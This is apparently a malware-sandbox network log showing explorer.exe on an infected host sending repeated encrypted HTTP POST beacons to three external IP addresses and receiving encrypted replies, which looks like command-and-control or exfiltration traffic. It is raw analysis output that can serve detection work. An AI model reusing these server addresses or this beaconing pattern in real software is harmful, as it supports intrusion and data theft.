ZD7UKHgpCTO3r20ph0jTlNY8XuGQKY9lMPXzjRq6lBadbl/RGV/iefGZK+P2MC2EnZDhjBXmjcpdy3SeNDfoev3h6Sj9122i7UwVqXswIQuEZ9s2aw8aZI8M1ERRu5Rd79KWOJkWirI+AQuOZNagQ+SoACGNgXqqr0rByC7F7X+IMCm1qxKZpX6YS4DUvlzp0DsmEXaXVrK9azBhdQBalG4qiJCvRmqcNTzrStB5w9X2wrexjKqALdqOXWdkq7K

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.5	51871	107.173.160.139	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:31:25 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-27 05:31:25 UTC	1267	OUT	Data Raw: 4d 6f 70 77 4a 65 30 4d 41 79 63 47 58 59 66 6a 6f 4b 39 75 5a 4d 74 6a 76 6d 7a 77 75 78 36 6d 57 2f 76 73 69 31 43 34 2f 57 6c 71 66 30 42 48 30 5a 57 6d 48 50 4d 64 6a 75 48 62 45 58 48 77 69 72 51 49 64 37 70 44 7a 2b 4c 6d 2f 62 41 77 4c 33 2f 35 56 44 49 66 78 7a 62 73 38 32 4e 59 42 4b 48 62 59 42 6a 2b 68 76 6b 52 35 6c 48 45 53 37 31 39 79 67 75 6b 52 71 4e 4a 73 6c 61 4f 57 46 69 50 4f 71 54 63 74 4a 63 41 6d 4f 73 32 66 45 35 39 75 70 32 73 75 67 50 50 54 71 46 43 61 2b 4a 6b 65 49 6e 6b 44 52 68 4b 2b 7a 75 2f 5a 44 6d 48 53 42 4c 77 54 58 34 53 39 39 78 78 47 33 4f 61 44 63 46 65 71 4e 39 34 36 31 4f 59 4f 49 42 62 72 6c 2f 62 77 35 67 66 46 31 68 6b 49 69 4a 37 31 6a 6e 4a 7a 50 59 52 4b 46 6e 4a 58 52 31 75 77 52 44 7a 69 48 6a 33 42 33 4f Data Ascii: MopwJe0MAycGXYfjoK9uZMtjvmzwux6mW/vsi1C4/Wlqf0BH0ZWmHPMdjuHbEXHwirQId7pDz+Lm/bAwL3/5VDIfxzbs82NYBKHbYBj+hvkR5lHES719ygukRqNJslaOWFiPOqTctJcAmOs2fE59up2sugPPTqFCa+JkeInkDRhK+zu/ZDmHSBLwTX4S99xxG3OaDcFeqN9461OYOIBbrl/bw5gfF1hkIiJ71jnJzPYRKFnJXR1uwRDziHj3B3O
2024-07-27 05:31:26 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:31:26 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:31:26 UTC	685	IN	Data Raw: 4c 73 5a 7a 4d 66 62 4f 72 39 38 54 68 36 6f 65 4e 47 79 58 4f 4f 69 47 70 42 42 64 45 7a 75 78 67 30 38 49 33 7a 4e 31 2b 39 6a 71 71 74 38 42 6e 33 4e 77 75 4b 2f 42 4c 51 71 6b 49 47 53 31 4f 43 74 6a 32 44 6b 32 68 43 57 54 4c 63 42 44 75 35 69 43 68 5a 49 53 2f 4b 47 74 6f 61 4e 71 4e 35 41 73 6b 65 64 44 44 67 5a 32 61 43 7a 37 79 6e 36 48 7a 36 38 65 4b 47 63 57 41 53 61 77 33 30 69 75 58 72 51 37 47 46 47 63 69 4f 2f 56 31 45 56 72 36 4c 33 35 4b 59 4d 67 63 70 63 4e 76 57 30 54 55 6a 74 49 7a 57 77 78 33 6e 6e 64 76 78 6a 57 58 35 4c 69 4c 75 6b 79 58 43 77 4c 44 45 47 46 33 6a 56 31 4e 68 35 78 50 77 55 75 38 54 30 63 55 6a 79 4b 4b 76 75 73 50 73 4b 62 4c 76 70 71 34 36 78 74 50 38 2f 41 65 53 67 4a 79 34 72 6c 6f 46 44 51 56 47 6a 41 4e 79 4c Data Ascii: LsZzMfbOr98Th6oeNGyXOOiGpBBdEzuxg08I3zN1+9jqqt8Bn3NwuK/BLQqkIGS1OCtj2Dk2hCWTLcBDu5iChZIS/KGtoaNqN5AskedDDgZ2aCz7yn6Hz68eKGcWASaw30iuXrQ7GFGciO/V1EVr6L35KYMgcpcNvW0TUjtIzWwx3nndvxjWX5LiLukyXCwLDEGF3jV1Nh5xPwUu8T0cUjyKKvusPsKbLvpq46xtP8/AeSgJy4rloFDQVGjANyL

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.5	51872	167.235.128.153	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:31:27 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-27 05:31:27 UTC	1267	OUT	Data Raw: 48 75 71 34 54 42 61 56 72 39 69 72 6d 44 69 6c 51 48 56 72 4d 69 55 37 4c 5a 63 53 35 52 66 78 6c 4a 69 51 43 62 6c 2b 56 6f 65 74 49 6c 66 4c 66 76 6c 63 5a 6a 6b 41 58 37 65 75 54 58 44 62 42 44 36 6d 37 6c 6a 34 2f 30 49 4e 43 6b 64 55 70 36 41 55 77 6a 6e 35 34 64 4e 46 32 75 37 53 79 39 30 4b 4e 77 61 75 33 47 52 42 76 5a 71 67 66 79 6f 59 45 79 41 6d 41 63 4e 43 30 72 62 57 48 65 6a 6a 62 64 61 32 31 6b 54 33 45 78 56 33 30 69 70 35 43 61 66 70 67 44 71 56 6c 50 39 52 6e 49 34 55 4b 30 68 79 42 4c 48 2b 6f 67 78 46 70 57 30 58 70 52 38 5a 38 49 5a 6e 42 33 47 68 66 43 36 74 30 47 6c 58 41 35 39 53 2f 71 35 44 41 62 4e 41 50 58 50 74 59 54 48 76 64 71 2f 6d 69 48 42 56 74 67 30 46 42 78 55 47 6f 76 51 74 56 72 2b 66 4c 30 6f 69 65 74 67 46 63 49 34 Data Ascii: Huq4TBaVr9irmDilQHVrMiU7LZcS5RfxlJiQCbl+VoetIlfLfvlcZjkAX7euTXDbBD6m7lj4/0INCkdUp6AUwjn54dNF2u7Sy90KNwau3GRBvZqgfyoYEyAmAcNC0rbWHejjbda21kT3ExV30ip5CafpgDqVlP9RnI4UK0hyBLH+ogxFpW0XpR8Z8IZnB3GhfC6t0GlXA59S/q5DAbNAPXPtYTHvdq/miHBVtg0FBxUGovQtVr+fL0oietgFcI4
2024-07-27 05:31:28 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:31:28 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:31:28 UTC	685	IN	Data Raw: 49 4d 70 63 36 75 55 51 4a 33 71 4b 4c 6a 6c 48 4b 53 51 49 6e 5a 77 5a 69 49 54 77 70 7a 55 30 77 53 36 39 54 61 67 6b 50 44 67 4a 69 6d 36 73 55 6c 6c 74 35 5a 77 68 50 43 74 36 68 6e 66 73 35 57 36 62 67 70 54 4e 43 6f 42 59 69 64 38 56 54 51 41 2b 62 56 52 59 56 65 56 4f 52 62 32 42 2f 4a 66 4e 6c 41 65 51 74 53 34 75 53 51 79 4b 45 44 57 2f 35 41 49 53 65 7a 39 32 58 49 5a 79 50 41 36 56 6c 4c 70 79 57 71 33 2b 72 64 4a 68 2f 69 61 6b 43 4e 77 6c 5a 33 46 41 49 37 54 72 5a 44 4c 59 52 5a 33 50 54 65 51 61 71 6c 47 54 44 6f 4f 67 44 41 41 68 6a 33 66 72 7a 55 58 2b 63 42 51 63 2b 52 62 53 4c 77 6e 61 76 79 61 47 34 43 49 75 6b 34 63 2b 48 4d 51 6e 36 38 37 53 4b 2b 72 70 74 50 65 41 71 6c 63 58 38 31 49 53 50 42 58 47 59 4a 48 51 71 69 4d 36 57 72 62 Data Ascii: IMpc6uUQJ3qKLjlHKSQInZwZiITwpzU0wS69TagkPDgJim6sUllt5ZwhPCt6hnfs5W6bgpTNCoBYid8VTQA+bVRYVeVORb2B/JfNlAeQtS4uSQyKEDW/5AISez92XIZyPA6VlLpyWq3+rdJh/iakCNwlZ3FAI7TrZDLYRZ3PTeQaqlGTDoOgDAAhj3frzUX+cBQc+RbSLwnavyaG4CIuk4c+HMQn687SK+rptPeAqlcX81ISPBXGYJHQqiM6Wrb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.5	51873	107.173.160.137	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:31:29 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:31:29 UTC	1122	OUT	Data Raw: 51 51 43 66 44 79 6a 59 78 38 6c 68 42 33 51 70 72 4f 38 68 71 4e 75 53 77 76 4f 65 47 64 6f 78 4c 4f 67 7a 30 62 31 41 4e 4f 4e 59 66 6c 5a 5a 61 33 50 48 45 4f 47 69 45 63 4a 34 34 70 4b 41 6a 64 50 2f 6b 4f 4a 5a 2f 6e 67 76 45 71 75 4e 6d 32 51 49 70 54 68 77 63 41 39 33 73 43 71 30 4b 54 63 37 6b 64 30 75 52 51 66 4f 77 79 6d 6f 50 62 6a 6f 54 30 2b 64 77 6c 50 53 78 34 63 6a 55 61 73 39 38 32 4f 31 37 51 39 4b 44 69 43 4f 4d 57 45 7a 55 35 48 33 46 30 38 31 45 70 77 31 61 39 72 61 56 41 35 67 46 46 79 4e 37 4b 68 72 6d 31 4e 50 63 6e 52 43 6c 4e 71 71 47 66 43 74 50 76 49 2b 37 75 4f 56 38 52 44 4c 4c 55 6a 5a 36 49 42 67 61 77 6f 38 68 49 6a 6f 6f 33 4b 6d 61 47 63 30 4a 56 58 7a 43 71 6f 30 39 35 6d 55 51 56 59 4c 4f 45 6e 79 45 48 61 7a 6c 4e 75 Data Ascii: QQCfDyjYx8lhB3QprO8hqNuSwvOeGdoxLOgz0b1ANONYflZZa3PHEOGiEcJ44pKAjdP/kOJZ/ngvEquNm2QIpThwcA93sCq0KTc7kd0uRQfOwymoPbjoT0+dwlPSx4cjUas982O17Q9KDiCOMWEzU5H3F081Epw1a9raVA5gFFyN7Khrm1NPcnRClNqqGfCtPvI+7uOV8RDLLUjZ6IBgawo8hIjoo3KmaGc0JVXzCqo095mUQVYLOEnyEHazlNu
2024-07-27 05:31:30 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:31:30 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:31:30 UTC	685	IN	Data Raw: 48 6c 58 67 6a 2b 79 4c 54 6a 4d 47 57 6a 32 4f 73 5a 4a 34 35 41 32 59 63 73 38 2b 54 63 36 75 7a 37 48 70 2f 71 69 70 53 76 68 68 6c 4d 41 47 45 6d 49 4f 2f 30 34 31 39 38 52 79 50 50 43 76 6b 35 6b 74 6b 65 58 6b 75 2b 45 42 4f 51 79 6f 62 6d 75 67 33 43 70 62 34 4c 37 51 54 73 50 35 73 56 2b 46 72 49 50 6a 66 66 42 65 49 76 67 65 5a 4c 65 43 51 42 6c 45 58 58 34 7a 70 30 48 68 52 68 51 63 51 48 38 2f 57 79 35 57 4b 47 66 48 50 6f 6b 30 66 4a 79 4d 34 6b 45 73 6d 75 2f 6c 31 78 55 37 32 50 56 71 66 46 57 47 4d 63 31 33 36 6b 42 76 2f 32 74 74 6c 64 2b 30 63 76 30 72 52 4f 35 63 58 49 41 47 75 44 67 4c 6a 4d 42 53 30 4c 68 34 44 6d 6c 57 63 4d 34 65 50 31 68 44 4e 68 43 79 67 30 49 48 49 2b 6a 37 41 61 4a 69 6a 62 6c 2f 46 4e 49 52 56 34 56 70 48 35 46 Data Ascii: HlXgj+yLTjMGWj2OsZJ45A2Ycs8+Tc6uz7Hp/qipSvhhlMAGEmIO/04198RyPPCvk5ktkeXku+EBOQyobmug3Cpb4L7QTsP5sV+FrIPjffBeIvgeZLeCQBlEXX4zp0HhRhQcQH8/Wy5WKGfHPok0fJyM4kEsmu/l1xU72PVqfFWGMc136kBv/2ttld+0cv0rRO5cXIAGuDgLjMBS0Lh4DmlWcM4eP1hDNhCyg0IHI+j7AaJijbl/FNIRV4VpH5F

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.5	51874	107.173.160.139	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:31:31 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:31:31 UTC	1122	OUT	Data Raw: 4c 76 47 51 39 63 61 4e 62 79 56 42 36 66 6b 34 79 59 71 6f 31 6f 31 6a 57 37 74 62 45 73 6e 66 7a 69 34 6b 70 4c 35 34 73 6f 77 76 41 62 70 7a 43 34 70 6f 69 65 63 4e 2f 79 6a 36 73 6f 55 7a 62 72 42 78 51 43 6a 4b 54 45 4e 65 73 52 42 71 32 79 43 6d 61 67 32 48 70 2b 53 58 4e 79 48 68 45 54 41 44 7a 79 71 30 62 37 72 30 65 37 4a 54 76 62 76 65 32 62 58 41 4e 74 30 53 73 6d 66 35 39 4f 2f 49 79 76 38 51 55 46 76 4e 79 32 57 71 57 53 68 6d 54 51 58 6d 4e 72 64 6c 6a 36 74 4b 54 48 47 66 57 42 76 58 68 71 6f 43 49 34 46 68 59 2b 30 47 48 69 2b 6f 42 61 31 37 63 41 67 79 56 6a 4f 56 42 32 4b 6a 34 5a 2b 2f 6a 52 58 51 37 32 6b 51 46 4b 4c 63 67 5a 33 6c 50 43 50 31 74 63 64 6b 44 48 43 57 34 74 70 67 34 36 39 51 39 76 42 61 4c 30 41 72 35 6c 34 48 6a 50 4c Data Ascii: LvGQ9caNbyVB6fk4yYqo1o1jW7tbEsnfzi4kpL54sowvAbpzC4poiecN/yj6soUzbrBxQCjKTENesRBq2yCmag2Hp+SXNyHhETADzyq0b7r0e7JTvbve2bXANt0Ssmf59O/Iyv8QUFvNy2WqWShmTQXmNrdlj6tKTHGfWBvXhqoCI4FhY+0GHi+oBa17cAgyVjOVB2Kj4Z+/jRXQ72kQFKLcgZ3lPCP1tcdkDHCW4tpg469Q9vBaL0Ar5l4HjPL
2024-07-27 05:31:32 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:31:32 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:31:32 UTC	685	IN	Data Raw: 4a 4d 67 79 38 56 7a 6f 63 6e 68 6f 30 4d 6a 63 34 54 52 4c 66 79 32 52 6b 78 54 4f 4a 6e 63 39 55 63 36 35 4f 6b 78 6c 4a 4f 74 74 56 68 33 59 6f 4e 69 54 49 4c 53 43 32 55 36 37 43 48 45 58 46 67 63 6e 66 50 58 69 72 35 74 72 50 46 44 4b 42 75 4d 44 45 44 4c 4e 73 72 47 6d 48 37 59 74 74 61 77 73 6a 4e 52 61 37 48 78 70 78 61 53 72 33 69 53 49 30 63 74 36 68 76 5a 52 2b 49 59 76 47 7a 34 66 7a 76 56 4e 77 49 48 35 43 37 67 6a 49 4f 53 34 4d 2b 4b 36 41 35 44 4b 48 33 2b 42 4e 58 6f 67 77 66 33 58 56 35 54 35 70 68 4e 2f 6d 78 53 6e 2f 62 78 4f 36 69 31 79 34 62 4f 6a 52 59 57 4c 31 64 71 4a 35 39 4c 2b 57 39 65 5a 41 65 2f 6e 62 52 42 32 41 79 6b 4e 76 34 6d 78 6a 2b 6f 2b 78 34 30 37 67 41 46 39 48 57 5a 6a 52 66 64 73 67 30 44 61 77 6a 4d 54 7a 48 35 Data Ascii: JMgy8Vzocnho0Mjc4TRLfy2RkxTOJnc9Uc65OkxlJOttVh3YoNiTILSC2U67CHEXFgcnfPXir5trPFDKBuMDEDLNsrGmH7YttawsjNRa7HxpxaSr3iSI0ct6hvZR+IYvGz4fzvVNwIH5C7gjIOS4M+K6A5DKH3+BNXogwf3XV5T5phN/mxSn/bxO6i1y4bOjRYWL1dqJ59L+W9eZAe/nbRB2AykNv4mxj+o+x407gAF9HWZjRfdsg0DawjMTzH5

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.5	51875	167.235.128.153	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:31:33 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:31:33 UTC	1122	OUT	Data Raw: 54 76 63 4c 48 31 7a 6e 73 30 38 65 47 59 47 39 69 74 6f 42 31 71 46 46 79 6c 64 61 4b 77 74 58 77 39 6f 41 61 2f 69 59 56 71 46 48 39 4a 6e 47 61 77 72 47 53 34 4b 79 56 51 5a 75 34 49 35 57 71 67 32 75 76 4d 35 46 5a 32 39 46 35 64 6e 70 79 2f 51 4c 4f 41 54 4b 4e 69 39 76 56 42 69 4e 38 43 2b 31 70 53 6e 4c 50 7a 4f 47 66 4a 48 6f 47 62 35 33 38 38 74 6c 49 77 6d 68 6d 66 71 7a 63 6f 45 4a 6a 65 4f 45 44 4e 78 6d 30 71 37 62 6b 32 4d 7a 65 64 7a 35 4a 5a 66 41 73 76 30 67 4a 6e 73 65 48 4d 75 61 79 6e 31 35 57 37 5a 45 42 72 58 73 48 5a 43 49 48 66 61 67 6d 35 74 36 54 68 77 6a 61 58 45 62 71 74 2b 70 70 39 66 76 7a 6c 52 6a 46 65 48 61 56 4f 35 5a 56 52 69 34 67 46 41 57 5a 33 32 76 65 32 6d 49 4e 6c 55 51 56 7a 6f 53 55 6f 47 62 6a 6b 69 61 6f 39 56 Data Ascii: TvcLH1zns08eGYG9itoB1qFFyldaKwtXw9oAa/iYVqFH9JnGawrGS4KyVQZu4I5Wqg2uvM5FZ29F5dnpy/QLOATKNi9vVBiN8C+1pSnLPzOGfJHoGb5388tlIwmhmfqzcoEJjeOEDNxm0q7bk2Mzedz5JZfAsv0gJnseHMuayn15W7ZEBrXsHZCIHfagm5t6ThwjaXEbqt+pp9fvzlRjFeHaVO5ZVRi4gFAWZ32ve2mINlUQVzoSUoGbjkiao9V
2024-07-27 05:31:34 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:31:34 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:31:34 UTC	685	IN	Data Raw: 6e 42 6b 6c 71 4a 34 6f 69 61 36 4e 53 2f 35 56 47 32 4c 4a 2f 69 44 33 33 6a 67 70 42 67 47 6e 35 74 79 78 6f 43 53 46 74 70 7a 47 61 41 38 39 78 30 6a 7a 4e 6f 6f 6f 2b 41 66 2b 61 55 57 48 36 4b 39 77 4a 6a 45 63 48 57 61 2b 36 53 37 6f 77 38 5a 38 4a 71 77 4c 37 4f 49 36 4b 68 67 6b 56 6d 2f 4f 6d 2f 74 4c 4f 5a 65 63 4e 33 4f 35 37 51 48 6b 69 69 38 72 4d 43 46 76 66 33 6f 46 2b 6d 32 55 39 54 42 35 51 2b 36 37 4a 49 72 66 6a 31 49 78 64 4b 49 68 69 78 71 42 51 76 57 61 75 75 45 6f 54 70 69 38 2f 50 2f 53 77 55 33 62 4c 6c 72 48 52 48 36 58 56 4e 5a 63 4d 64 71 73 61 44 72 4b 77 4c 4e 45 78 53 4f 67 36 47 65 5a 4f 45 55 37 65 4e 2f 72 63 6d 65 79 58 61 4e 6e 6e 47 54 61 7a 56 35 6b 4e 64 6f 4d 47 79 77 51 79 30 4e 4d 6d 50 6e 64 57 69 6d 6f 61 64 71 Data Ascii: nBklqJ4oia6NS/5VG2LJ/iD33jgpBgGn5tyxoCSFtpzGaA89x0jzNooo+Af+aUWH6K9wJjEcHWa+6S7ow8Z8JqwL7OI6KhgkVm/Om/tLOZecN3O57QHkii8rMCFvf3oF+m2U9TB5Q+67JIrfj1IxdKIhixqBQvWauuEoTpi8/P/SwU3bLlrHRH6XVNZcMdqsaDrKwLNExSOg6GeZOEU7eN/rcmeyXaNnnGTazV5kNdoMGywQy0NMmPndWimoadq

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.5	51876	107.173.160.137	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:31:35 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:31:35 UTC	1122	OUT	Data Raw: 6a 53 55 2f 73 70 50 37 73 51 61 74 51 68 57 5a 46 6a 4c 4e 75 66 4d 35 72 31 47 77 33 44 50 4c 76 79 6b 6b 7a 6b 62 4d 4e 4e 73 63 50 55 30 76 5a 61 47 2f 6e 46 6e 45 65 44 45 72 43 46 6c 6d 37 49 62 64 52 79 4b 32 4b 4a 74 2f 4d 6b 76 46 74 6d 53 44 51 32 6f 59 48 2f 4c 6e 4e 34 6a 7a 42 35 5a 4a 58 6e 59 4f 62 69 72 38 36 44 4c 6a 63 78 67 42 53 4d 71 6d 39 62 36 5a 38 62 50 54 49 4b 54 41 65 50 43 59 78 52 61 71 69 53 4d 44 32 68 30 4d 75 32 48 61 52 65 73 34 75 72 57 68 52 51 55 39 4b 53 51 38 64 2b 35 51 34 2f 32 43 54 74 78 37 43 79 4a 2f 6f 75 52 49 4b 64 4b 4c 42 2b 79 66 34 51 63 63 52 6a 34 58 55 6e 79 64 55 75 6d 47 5a 6b 45 32 65 46 7a 74 65 5a 63 55 68 69 57 6a 6c 5a 77 68 34 49 73 51 41 4e 6d 54 55 31 34 63 2b 34 62 5a 4c 5a 66 4b 48 6a 55 Data Ascii: jSU/spP7sQatQhWZFjLNufM5r1Gw3DPLvykkzkbMNNscPU0vZaG/nFnEeDErCFlm7IbdRyK2KJt/MkvFtmSDQ2oYH/LnN4jzB5ZJXnYObir86DLjcxgBSMqm9b6Z8bPTIKTAePCYxRaqiSMD2h0Mu2HaRes4urWhRQU9KSQ8d+5Q4/2CTtx7CyJ/ouRIKdKLB+yf4QccRj4XUnydUumGZkE2eFzteZcUhiWjlZwh4IsQANmTU14c+4bZLZfKHjU
2024-07-27 05:31:36 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:31:36 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:31:36 UTC	685	IN	Data Raw: 4b 2b 6b 59 6c 42 4d 66 37 49 33 4b 73 79 61 6b 46 44 52 77 71 51 35 58 71 5a 62 4d 30 48 31 4f 5a 53 38 55 6f 57 39 56 46 66 74 44 56 73 6e 74 6b 65 6e 42 70 4d 33 57 75 59 44 30 71 63 73 33 46 65 38 39 70 78 36 72 34 7a 75 49 2f 54 39 72 51 54 5a 79 4e 42 72 78 42 6a 31 2f 6c 43 68 37 69 45 50 61 48 58 6e 77 64 6a 4b 7a 72 2f 6e 69 61 6a 53 33 38 34 4a 6a 4b 6e 62 30 76 34 4c 54 78 2f 4b 47 78 59 5a 38 44 46 6e 66 67 57 6c 2f 75 62 6c 2b 47 64 6f 62 76 38 58 78 48 45 50 72 75 51 31 6c 4c 30 4a 4f 65 4a 6c 77 52 6b 69 78 52 75 46 47 48 6b 6c 42 52 52 75 54 4a 57 4f 46 67 74 4a 75 30 39 33 73 43 71 6a 64 67 2f 79 58 4e 30 5a 4a 37 6b 4b 72 43 6f 43 52 74 37 33 51 37 44 56 34 2f 30 30 69 54 6c 30 2f 4a 6a 5a 6a 59 50 50 73 4b 73 57 4c 69 6b 48 4b 32 5a 32 Data Ascii: K+kYlBMf7I3KsyakFDRwqQ5XqZbM0H1OZS8UoW9VFftDVsntkenBpM3WuYD0qcs3Fe89px6r4zuI/T9rQTZyNBrxBj1/lCh7iEPaHXnwdjKzr/niajS384JjKnb0v4LTx/KGxYZ8DFnfgWl/ubl+Gdobv8XxHEPruQ1lL0JOeJlwRkixRuFGHklBRRuTJWOFgtJu093sCqjdg/yXN0ZJ7kKrCoCRt73Q7DV4/00iTl0/JjZjYPPsKsWLikHK2Z2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.5	51877	107.173.160.139	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:31:37 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:31:37 UTC	1122	OUT	Data Raw: 47 34 78 73 4f 72 46 66 57 4f 41 32 6a 57 31 6f 71 61 6d 38 56 41 4b 78 47 2f 6a 76 6e 57 70 56 53 75 53 56 62 32 33 34 2f 59 39 6f 44 4b 42 58 63 59 56 4d 69 30 51 49 36 49 74 2f 4a 4a 76 70 51 4f 39 6d 37 34 4b 4e 34 58 4d 7a 70 57 34 78 76 54 54 73 57 6d 6f 49 4e 32 45 6e 63 54 34 32 54 39 65 63 43 37 70 4b 63 55 6a 52 78 4d 53 50 67 35 72 51 43 62 7a 48 63 37 59 53 30 42 62 6a 58 2f 76 38 79 49 56 4d 4e 2b 33 6f 48 63 57 53 4c 57 52 54 50 4f 41 32 49 4b 41 50 41 4d 58 6e 2f 77 4d 6c 78 36 68 77 4b 4e 5a 50 6e 5a 72 33 66 77 77 66 70 30 76 38 45 31 65 35 4a 68 36 73 59 68 58 71 52 38 5a 74 32 49 4d 42 39 42 73 4b 36 32 6b 62 66 46 46 73 67 30 31 4a 38 32 56 6a 6e 7a 79 46 56 42 31 74 48 6a 76 6d 32 57 7a 55 41 77 35 6e 55 32 6b 6f 52 52 74 65 66 49 49 Data Ascii: G4xsOrFfWOA2jW1oqam8VAKxG/jvnWpVSuSVb234/Y9oDKBXcYVMi0QI6It/JJvpQO9m74KN4XMzpW4xvTTsWmoIN2EncT42T9ecC7pKcUjRxMSPg5rQCbzHc7YS0BbjX/v8yIVMN+3oHcWSLWRTPOA2IKAPAMXn/wMlx6hwKNZPnZr3fwwfp0v8E1e5Jh6sYhXqR8Zt2IMB9BsK62kbfFFsg01J82VjnzyFVB1tHjvm2WzUAw5nU2koRRtefII
2024-07-27 05:31:38 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:31:38 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:31:38 UTC	685	IN	Data Raw: 53 75 54 51 5a 6e 32 6e 50 51 4c 66 69 6b 62 53 6f 43 73 65 49 75 6a 36 4c 65 2b 69 49 67 54 44 48 70 4b 51 71 33 45 35 55 47 46 67 67 56 51 6e 76 76 32 73 77 7a 63 6e 38 4a 72 49 5a 64 53 4f 48 61 64 48 7a 41 67 4c 2f 53 65 4b 37 70 75 67 57 62 50 32 7a 45 65 6d 6a 32 67 67 30 54 4e 68 74 57 66 67 50 6a 4e 53 75 6f 30 35 77 69 2f 69 30 51 37 7a 61 4b 74 54 4a 48 69 63 4f 6d 2f 59 6f 44 45 33 64 54 47 48 79 4c 45 71 61 55 39 56 4e 46 53 48 53 69 35 38 4d 6f 76 58 42 50 74 55 45 4f 65 70 49 4b 4a 69 4a 75 67 35 74 46 6b 65 34 37 53 4a 6a 77 77 54 65 65 61 30 76 4d 35 2b 58 30 67 49 57 50 54 66 51 64 72 32 58 64 6a 78 64 36 59 4b 53 6a 39 54 62 37 32 56 4c 61 4c 44 68 69 76 76 31 41 61 49 6d 30 74 35 62 52 61 6e 51 6a 33 55 57 49 6d 75 58 63 70 4a 4d 36 33 Data Ascii: SuTQZn2nPQLfikbSoCseIuj6Le+iIgTDHpKQq3E5UGFggVQnvv2swzcn8JrIZdSOHadHzAgL/SeK7pugWbP2zEemj2gg0TNhtWfgPjNSuo05wi/i0Q7zaKtTJHicOm/YoDE3dTGHyLEqaU9VNFSHSi58MovXBPtUEOepIKJiJug5tFke47SJjwwTeea0vM5+X0gIWPTfQdr2Xdjxd6YKSj9Tb72VLaLDhivv1AaIm0t5bRanQj3UWImuXcpJM63

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.5	51878	167.235.128.153	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:31:39 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
